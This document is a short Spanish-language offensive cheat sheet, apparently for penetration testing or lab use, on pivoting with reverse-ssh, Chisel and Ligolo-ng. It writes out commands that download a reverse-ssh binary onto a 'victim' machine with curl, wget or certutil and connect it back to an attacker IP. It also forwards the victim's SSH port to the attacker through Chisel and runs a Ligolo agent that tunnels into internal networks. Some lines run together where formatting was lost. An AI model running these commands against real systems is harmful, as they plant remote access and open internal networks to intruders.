RevSSH
Attack machine:
bash
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
/dev/shm/reverse-ssh -v -l :4444Victim Machine:
Linux
bash
# Drop it via your preferred way, e.g.
curl http://10.10.14.9:8000/upx_reverse-sshx86 -o /dev/shm/upx_reverse-sshx86
/dev/shm/reverse-ssh -p 3333 USERATACANTE@IPATACANTEWindows
powershell
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
reverse-ssh.exe -p 3333 USERATACANTE@IPATACANTEEn tu máquina
bash
ssh -p 8888 127.0.0.1letmeinbrudiplsChisel
Atacante
bash
chisel server --port 8000 --reverseVíctima
Redirigirá el 22 de la víctima al 8888 del atacante:
chisel client <IP_SERVIDOR>:8000 R:8888:127.0.0.1:22Ligolo-ng
Compilar dinámicamente:
bash
go build -o agent /cmd/agent/main.goCompilar estáticamente:
bash
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o agent -ldflags "-s -w" cmd/agent/main.gobash
sudo ip tuntap add user <Your Username> mode tun ligolo
cbash
ligolo-proxy -selfcertEn la víctima
bash
./agent -connect <Attack IP>:11601 -ignore-certPara listar las sesiones : session y elegimos una.
Podemos ejecutar ifconfig para ver las interfaces que tiene y en base a eso configuramos la interfaz en nuestra kali
Dentro de la sesión ejecutamos start
bash
sudo ip route add 172.16.20.0/24 dev ligolo
sudo ip route replace 172.16.20.0/24 dev ligoloCuando se buguee la interfaz
bash
sudo ip link delete ligolo
sudo ip tuntap add dev ligolo mode tun
sudo ip link set ligolo up